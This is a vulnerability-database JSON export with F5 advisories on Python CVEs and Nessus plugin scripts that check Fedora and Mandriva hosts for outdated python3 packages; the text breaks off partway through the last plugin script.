[{"lastseen": "2017-10-12T02:11:08", "bulletinFamily": "software", "cvelist": ["CVE-2013-4238", "CVE-2009-2408"], "edition": 1, "description": " \n\n\nThe ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408. ([CVE-2013-4238](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4238>)) \n\n\nImpact \n\n\nNone. No F5 products are affected by this vulnerability. \n\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:20:00", "published": "2014-09-29T23:41:00", "href": "https://support.f5.com/csp/article/K15638", "id": "F5:K15638", "title": "Python vulnerability CVE-2013-4238", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-4238", "CVE-2009-2408"], "edition": 1, "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-10-17T00:00:00", "published": "2014-09-29T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15638.html", "id": "SOL15638", "title": "SOL15638 - Python vulnerability CVE-2013-4238", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-22T00:24:48", "bulletinFamily": "software", "cvelist": ["CVE-2014-1912", "CVE-2014-4650"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-07-21T22:49:00", "published": "2017-07-21T22:49:00", "href": "https://support.f5.com/csp/article/K93278412", "id": "F5:K93278412", "title": "Python and Jython vulnerabilities CVE-2014-1912 and CVE-2014-4650", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T10:12:14", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-10T00:00:00", "title": "Fedora 20 : python3-3.3.2-18.fc20 (2014-14245)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-10T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-14245.NASL", "href": "https://www.tenable.com/plugins/nessus/79076", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14245.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79076);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14245\");\n\n script_name(english:\"Fedora 20 : python3-3.3.2-18.fc20 (2014-14245)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d288d8e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"python3-3.3.2-18.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:12:14", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-14T00:00:00", "title": "Fedora 19 : python3-3.3.2-10.fc19 (2014-14257)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-14257.NASL", "href": "https://www.tenable.com/plugins/nessus/79238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14257.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79238);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14257\");\n\n script_name(english:\"Fedora 19 : python3-3.3.2-10.fc19 (2014-14257)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3b06ef1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"python3-3.3.2-10.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:12:13", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-11T00:00:00", "title": "Fedora 21 : python3-3.4.1-16.fc21 (2014-14208)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-14208.NASL", "href": "https://www.tenable.com/plugins/nessus/79095", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14208.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79095);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14208\");\n\n script_name(english:\"Fedora 21 : python3-3.4.1-16.fc21 (2014-14208)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143191.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bb72edb4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"python3-3.4.1-16.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T11:55:01", "description": "Updated python3 packages fix security vulnerabilities :\n\nZipExtFile.read goes into 100% CPU infinite loop on maliciously binary\nedited zips (CVE-2013-7338).\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nIt was reported that a patch added to Python 3.2 caused a race\ncondition where a file created could be created with world read/write\npermissions instead of the permissions dictated by the original umask\nof the process. This could allow a local attacker that could win the\nrace to view and edit files created by a program using this call. Note\nthat prior versions of Python, including 2.x, do not include the\nvulnerable _get_masked_mode() function that is used by os.makedirs()\nwhen exist_ok is set to True (CVE-2014-2667).\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).", "edition": 27, "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : python3 (MDVSA-2015:076)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2014-2667", "CVE-2013-7338", "CVE-2014-4616", "CVE-2014-4650"], "modified": "2015-03-30T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tkinter3-apps", "p-cpe:/a:mandriva:linux:python3-docs", "p-cpe:/a:mandriva:linux:lib64python3-devel", "cpe:/o:mandriva:business_server:2", "p-cpe:/a:mandriva:linux:lib64python3.3", "p-cpe:/a:mandriva:linux:python3", "p-cpe:/a:mandriva:linux:tkinter3"], "id": "MANDRIVA_MDVSA-2015-076.NASL", "href": "https://www.tenable.com/plugins/nessus/82329", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:076. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82329);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7338\", \"CVE-2014-1912\", \"CVE-2014-2667\", \"CVE-2014-4616\", \"CVE-2014-4650\");\n script_xref(name:\"MDVSA\", value:\"2015:076\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python3 (MDVSA-2015:076)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python3 packages fix security vulnerabilities :\n\nZipExtFile.read goes into 100% CPU infinite loop on maliciously binary\nedited zips (CVE-2013-7338).\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nIt was reported that a patch added to Python 3.2 caused a race\ncondition where a file created could be created with world read/write\npermissions instead of the permissions dictated by the original umask\nof the process. This could allow a local attacker that could win the\nrace to view and edit files created by a program using this call. Note\nthat prior versions of Python, including 2.x, do not include the\nvulnerable _get_masked_mode() function that is used by os.makedirs()\nwhen exist_ok is set to True (CVE-2014-2667).\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0085.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0140.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python3-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter3-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python3-devel-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python3.3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"python3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python3-docs-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter3-apps-3.3.2-14.1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) 